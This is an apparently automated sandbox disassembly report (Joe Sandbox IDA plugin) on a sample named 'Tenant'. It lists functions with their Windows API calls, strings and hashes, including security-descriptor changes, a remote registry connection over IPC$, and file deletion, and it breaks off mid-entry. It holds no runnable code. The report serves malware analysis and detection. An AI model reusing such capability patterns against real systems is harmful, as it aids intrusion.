                                                                                        Function 00B2C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00B2C8A4
                                                                                        • GetFocus.USER32 ref: 00B2C8B4
                                                                                        • GetDlgCtrlID.USER32(00000000), ref: 00B2C8BF
                                                                                        • _memset.LIBCMT ref: 00B2C9EA
                                                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00B2CA15
                                                                                        • GetMenuItemCount.USER32(?), ref: 00B2CA35
                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00B2CA48
                                                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00B2CA7C
                                                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00B2CAC4
                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B2CAFC
                                                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00B2CB31
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                        • String ID: 0
                                                                                        • API String ID: 1296962147-4108050209
                                                                                        • Opcode ID: 7ceed00bea0e3432a4138928aaf4843e0902c3b33a289475d5e7be9988d5aa8d
                                                                                        • Instruction ID: 253524f6922e94e38b9a83c3d63652eaf65ec7f0b832a2a0b43502ad6993ebcc
                                                                                        • Opcode Fuzzy Hash: 7ceed00bea0e3432a4138928aaf4843e0902c3b33a289475d5e7be9988d5aa8d
                                                                                        • Instruction Fuzzy Hash: BC819B702083259FD710DF14E985A6EBBE8FF89314F1045ADF99993291CB30DD05CBA2
                                                                                        Function 00AF8ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AF8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8E3C
                                                                                          • Part of subcall function 00AF8E20: GetLastError.KERNEL32(?,00AF8900,?,?,?), ref: 00AF8E46
                                                                                          • Part of subcall function 00AF8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AF8900,?,?,?), ref: 00AF8E55
                                                                                          • Part of subcall function 00AF8E20: HeapAlloc.KERNEL32(00000000,?,00AF8900,?,?,?), ref: 00AF8E5C
                                                                                          • Part of subcall function 00AF8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF8E73
                                                                                          • Part of subcall function 00AF8EBD: GetProcessHeap.KERNEL32(00000008,00AF8916,00000000,00000000,?,00AF8916,?), ref: 00AF8EC9
                                                                                          • Part of subcall function 00AF8EBD: HeapAlloc.KERNEL32(00000000,?,00AF8916,?), ref: 00AF8ED0
                                                                                          • Part of subcall function 00AF8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AF8916,?), ref: 00AF8EE1
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF8B2E
                                                                                        • _memset.LIBCMT ref: 00AF8B43
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AF8B62
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00AF8B73
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00AF8BB0
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF8BCC
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00AF8BE9
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AF8BF8
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00AF8BFF
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AF8C20
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00AF8C27
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AF8C58
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AF8C7E
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF8C92
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: e098b3e19ddd4e486730235b1f6d0a53956e8f84d0354c53c2ba947373a86810
                                                                                        • Instruction ID: 3f837973a95e9fc03e2cb56fd46cc52704899fed95be207e97830bd15170d279
                                                                                        • Opcode Fuzzy Hash: e098b3e19ddd4e486730235b1f6d0a53956e8f84d0354c53c2ba947373a86810
                                                                                        • Instruction Fuzzy Hash: 6361547590020DAFDF149FA1DD85EBEBBB9FF04300F14816AFA15A7290DB399A05CB60
                                                                                        Function 00B17A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00B17A79
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B17A85
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00B17A91
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B17A9E
                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B17AF2
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B17B2E
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B17B52
                                                                                        • SelectObject.GDI32(00000006,?), ref: 00B17B5A
                                                                                        • DeleteObject.GDI32(?), ref: 00B17B63
                                                                                        • DeleteDC.GDI32(00000006), ref: 00B17B6A
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00B17B75
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 2598888154-3887548279
                                                                                        • Opcode ID: 03f5bceae7c831c5b0b1bbeda987d34d0e6a39c0774aa768f9e95bb63a7e3ed9
                                                                                        • Instruction ID: b352f33b46a0ad24ad4b87d487664c65ba7719f61ca925022e6db42ab397d7de
                                                                                        • Opcode Fuzzy Hash: 03f5bceae7c831c5b0b1bbeda987d34d0e6a39c0774aa768f9e95bb63a7e3ed9
                                                                                        • Instruction Fuzzy Hash: 8F514A71954209EFCB14DFA8CC95EAEBBF9EF48310F14845DF95AA7210DB31A941CB60
                                                                                        Function 00B0A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B0A4D4
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00B0A4F6
                                                                                        • __swprintf.LIBCMT ref: 00B0A54F
                                                                                        • __swprintf.LIBCMT ref: 00B0A568
                                                                                        • _wprintf.LIBCMT ref: 00B0A61E
                                                                                        • _wprintf.LIBCMT ref: 00B0A63C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 311963372-2391861430
                                                                                        • Opcode ID: 440899baf24f9193ace81bf5c03aee718e873bba6672b22363dc0300243fdbb7
                                                                                        • Instruction ID: af77d34161f64ae9178c074a8bd29dcfeb33f1320f80ad0ab79ad00771b60f4b
                                                                                        • Opcode Fuzzy Hash: 440899baf24f9193ace81bf5c03aee718e873bba6672b22363dc0300243fdbb7
                                                                                        • Instruction Fuzzy Hash: 2B516D71800219AACF15EBE0CEA6EEEBBB9AF14340F5041A5F505721A2EF316F58CB51
                                                                                        Function 00B09710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00B0951A: __time64.LIBCMT ref: 00B09524
                                                                                          • Part of subcall function 00AB4A8C: _fseek.LIBCMT ref: 00AB4AA4
                                                                                        • __wsplitpath.LIBCMT ref: 00B097EF
                                                                                          • Part of subcall function 00AC431E: __wsplitpath_helper.LIBCMT ref: 00AC435E
                                                                                        • _wcscpy.LIBCMT ref: 00B09802
                                                                                        • _wcscat.LIBCMT ref: 00B09815
                                                                                        • __wsplitpath.LIBCMT ref: 00B0983A
                                                                                        • _wcscat.LIBCMT ref: 00B09850
                                                                                        • _wcscat.LIBCMT ref: 00B09863
                                                                                          • Part of subcall function 00B09560: _memmove.LIBCMT ref: 00B09599
                                                                                          • Part of subcall function 00B09560: _memmove.LIBCMT ref: 00B095A8
                                                                                        • _wcscmp.LIBCMT ref: 00B097AA
                                                                                          • Part of subcall function 00B09CF1: _wcscmp.LIBCMT ref: 00B09DE1
                                                                                          • Part of subcall function 00B09CF1: _wcscmp.LIBCMT ref: 00B09DF4
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B09A0D
                                                                                        • _wcsncpy.LIBCMT ref: 00B09A80
                                                                                        • DeleteFileW.KERNEL32(?,?), ref: 00B09AB6
                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B09ACC
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B09ADD
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B09AEF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                        • String ID:
                                                                                        • API String ID: 1500180987-0
                                                                                        • Opcode ID: d120eeb397bdaa94a2ff591d417e3ff4d1e2dea938bfbb92b7ddada6666dafe3
                                                                                        • Instruction ID: 4dd520d8facd59ab1a4a1cc81a6586a6bb61108da270b73d4fc45fa44d2737bd
                                                                                        • Opcode Fuzzy Hash: d120eeb397bdaa94a2ff591d417e3ff4d1e2dea938bfbb92b7ddada6666dafe3
                                                                                        • Instruction Fuzzy Hash: A6C13EB1D00219AADF11DF95CD85EDEBBBDEF48340F0040AAF609E7152EB319A858F65
                                                                                        Function 00AB5BD7 Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AB5BF1
                                                                                        • GetMenuItemCount.USER32(00B67890), ref: 00AF0E7B
                                                                                        • GetMenuItemCount.USER32(00B67890), ref: 00AF0F2B
                                                                                        • GetCursorPos.USER32(?), ref: 00AF0F6F
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00AF0F78
                                                                                        • TrackPopupMenuEx.USER32(00B67890,00000000,?,00000000,00000000,00000000), ref: 00AF0F8B
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AF0F97
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 2751501086-0
                                                                                        • Opcode ID: a0f3bd0807d6b483679e687e0c69b6c9e0f8abcd1424a57a3ff10e03ed646b68
                                                                                        • Instruction ID: b9b465dc7f868e87800abf353fe71ac59117464fbb0d885def3c396a2ffd240f
                                                                                        • Opcode Fuzzy Hash: a0f3bd0807d6b483679e687e0c69b6c9e0f8abcd1424a57a3ff10e03ed646b68
                                                                                        • Instruction Fuzzy Hash: 5671E430A44709BFFB219BA4CC89FEABF69FF05364F244216F614661D2CBB16850DB90
                                                                                        Function 00AF83FA Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        • _memset.LIBCMT ref: 00AF8489
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AF84BE
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AF84DA
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AF84F6
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AF8520
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00AF8548
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AF8553
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AF8558
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 1411258926-22481851
                                                                                        • Opcode ID: 9cac6ae4c1da72d0ba55a43230d9263a16661eef9d4c514545ce5acc81f736b4
                                                                                        • Instruction ID: 7f4b98d735b13536c30bcaf357ef036ab6f2254e23b93d2d44f0c15d5e6482fe
                                                                                        • Opcode Fuzzy Hash: 9cac6ae4c1da72d0ba55a43230d9263a16661eef9d4c514545ce5acc81f736b4
                                                                                        • Instruction Fuzzy Hash: 7E41F372C1022DABCF15EBE4DDA5DEEB7B8BF04341B444169F905A3162EA359E04CB90
                                                                                        Function 00B2147A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2040D,?,?), ref: 00B21491
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 3964851224-909552448
                                                                                        • Opcode ID: 31669228be4105af71258525411ae7c0d5329d72b09b539dc11bb7f210a52cb1
                                                                                        • Instruction ID: 83bb3d6aa6c4255c07458e2320f853fd14d6461059b561da22f1687752722688
                                                                                        • Opcode Fuzzy Hash: 31669228be4105af71258525411ae7c0d5329d72b09b539dc11bb7f210a52cb1
                                                                                        • Instruction Fuzzy Hash: 9741483150026ACFCF01EF54E951AEA37A5FF71310F6048D9EC565B296DB31AE1ACB60
                                                                                        Function 00B05882 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                          • Part of subcall function 00AB153B: _memmove.LIBCMT ref: 00AB15C4
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B058EB
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B05901
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B05912
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B05924
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B05935
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$_memmove
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 2279737902-1007645807
                                                                                        • Opcode ID: 7b251e665ae8374868d760acb582e7151afa4fabc75b8b9e3b96c7c9220156c1
                                                                                        • Instruction ID: 4dc15a27522cda7c2cca0f604f408d7414710476277e3a0a77877b9f6b818fa7
                                                                                        • Opcode Fuzzy Hash: 7b251e665ae8374868d760acb582e7151afa4fabc75b8b9e3b96c7c9220156c1
                                                                                        • Instruction Fuzzy Hash: 4F118231950169B9D720A7A1DC6AEFF7FBCFBD1B51F8004A9B801A20E1EE601D09C9A0
                                                                                        Function 00B04C0C Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 208665112-3771769585
                                                                                        • Opcode ID: 8ceb6b8e62464e55bf990ab95e1cb97fd289814d7a70e4ba82f7e4abe087c8a3
                                                                                        • Instruction ID: 6d1101009ba1487e3c835634cad30a3adf01b26fb7b47455db793acb084ed3e2
                                                                                        • Opcode Fuzzy Hash: 8ceb6b8e62464e55bf990ab95e1cb97fd289814d7a70e4ba82f7e4abe087c8a3
                                                                                        • Instruction Fuzzy Hash: 12110271504208ABEB25B7649D4AFEE7BFCDF41710F1101E9F504A20D1EF7099818B90
                                                                                        Function 00B05530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00B05535
                                                                                          • Part of subcall function 00AC083E: timeGetTime.WINMM(?,00000002,00AAC22C), ref: 00AC0842
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00B05561
                                                                                        • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00B05585
                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B055A7
                                                                                        • SetActiveWindow.USER32 ref: 00B055C6
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B055D4
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B055F3
                                                                                        • Sleep.KERNEL32(000000FA), ref: 00B055FE
                                                                                        • IsWindow.USER32 ref: 00B0560A
                                                                                        • EndDialog.USER32(00000000), ref: 00B0561B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        • Opcode ID: d1fdaeef3529c6e008a9c1c7ccb103d38388b11a6fb77184ff07d6fdbfbc2e2f
                                                                                        • Instruction ID: 375f7d53043d6cbf9db50834de9a27bf28bd96af9843bcea5c45f6fc5956350e
                                                                                        • Opcode Fuzzy Hash: d1fdaeef3529c6e008a9c1c7ccb103d38388b11a6fb77184ff07d6fdbfbc2e2f
                                                                                        • Instruction Fuzzy Hash: 8C219270104A08AFE7626F60ECE9B2A3FAAEB65749F101058F142835E1DFB55D50DE21
                                                                                        Function 00B0DBD0 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B0DC2D
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B0DCC0
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00B0DCD4
                                                                                        • CoCreateInstance.OLE32(00B33D4C,00000000,00000001,00B5B86C,?), ref: 00B0DD20
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B0DD8F
